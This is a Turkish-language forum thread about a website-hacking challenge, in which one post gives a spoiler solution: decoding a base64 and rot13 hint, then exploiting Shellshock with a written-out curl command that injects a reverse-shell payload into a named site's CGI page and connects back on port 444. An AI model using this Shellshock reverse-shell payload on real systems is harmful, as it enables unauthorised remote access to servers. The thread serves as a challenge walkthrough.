Meydan Okuma - Hack Website Vol. 2

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    pcdoktor636
    pcdoktor636's avatar
    Kayıt Tarihi: 12/Ocak/2010
    Erkek

    Oyunun içine etmek gibi olacak ama server yol geçen hanına dönmüş zaten adasdasd

    edit:shell adresi kaldırıldı afasdasd

    Bunların haricinde, olayı sadece mevcut site ile sınırlarsak daha güzel olur gibi. Sitede 3 tane açık buldum ama exploit edemedim maalesef(web tarafından baya kötüyüm)

     

    pcdoktor636 tarafından 04/Tem/15 00:18 tarihinde düzenlenmiştir
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    unix
    Andrei
    Andrei's avatar
    Banlanmış Üye
    Kayıt Tarihi: 11/Aralık/2008
    Erkek

    emanet bilgisayardan hallettim simdi :d ücüncüsüne de aksama dogru bakarım, güzeldi ama bu


    %40 indirimli olarak "Centos Sistem ve Sunucu Yönetimi" adlı kitabımızı satın alarak, Linux üzerine yapılacak olan devam projeleri icin destekte bulunabilirsiniz : http://www.hepsiburada.com/centos-sistem-ve-sunucu-yonetimi-oku-izle-dinle-ogren-p-KKODLAB01579
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Retro
    by_Tet
    by_Tet's avatar
    Kayıt Tarihi: 22/Mayıs/2012
    Erkek
    Andrei bunu yazdı

    emanet bilgisayardan hallettim simdi :d ücüncüsüne de aksama dogru bakarım, güzeldi ama bu

    Az önce farkettim helal olsun hocam :D Girmediğim yer kalmadı hala beceremedim


    iyibu! yeniden..
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    NoktaliVirgul
    NoktaliVirgul's avatar
    Kayıt Tarihi: 02/Temmuz/2007
    Erkek

    Site tamam da girecek yer sıkıntılı sanki


    If my calculations are correct, when this baby hits eighty-eight miles per hour... you"re gonna see some serious shit.
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Allura
    Allura's avatar
    Kayıt Tarihi: 17/Mayıs/2009
    Erkek

    İpucu veriyorum: base64 rot13 /bin/bash /dev/tcp/


    "
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Allura
    Allura's avatar
    Kayıt Tarihi: 17/Mayıs/2009
    Erkek

    ----- SPOILER COZUMU -----

    ----- SPOILER COZUMU -----

     

    bunu bir kişinin çözebilmesi beni şaşırttı açıkcası çok fazla deneeyen oldu özellikle acunetixler dirbusterlar havalarda ucuştu bu challangeta ancak yanlış yapıldı hep

    şimdi öncelikle kriptu 

    base64 ve ro13 olarak iki kere şifrelendi 

    http://runakay502.com domainine ulaışıyor çözdürüldügünde // base64decode.org/ http://rot13.com

    buradaki güvenlik açıgı ise yazılımsal bir açık degil sistemsel bir açık bash sistemindeki açık sayesinde siteye backconnect yaparak dosyayı düzenleyecektiniz

    bkz: https://en.wikipedia.org/wiki/Shellshock_(software_bug)

    terminale girip ( curl yüklü oldugu farzediliyor )

     curl -A '() { :; }; /bin/bash -i >& /dev/tcp/ipadresimiz/444 0>&1' http://www.runakay502.com/cgi-sys/suspendedpage.cgi

    bu şekilde en basitinden curl ile kendi ip adresimize 444. porttan backconnect yapmaya olana sağladık ( tabikide o aanda kendi ağımızda 444. portumuzu listen etmemiz gerekiyor ki bağlanalım )

     

    ----- SPOILER COZUMU -----

    ----- SPOILER COZUMU -----


    "
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    cemnet
    cemnet's avatar
    Kayıt Tarihi: 18/Eylül/2007
    Erkek

    bu konular andrei virali gibi olmuş :D

Toplam Hit: 8774 Toplam Mesaj: 27
challange meydan okuma ctf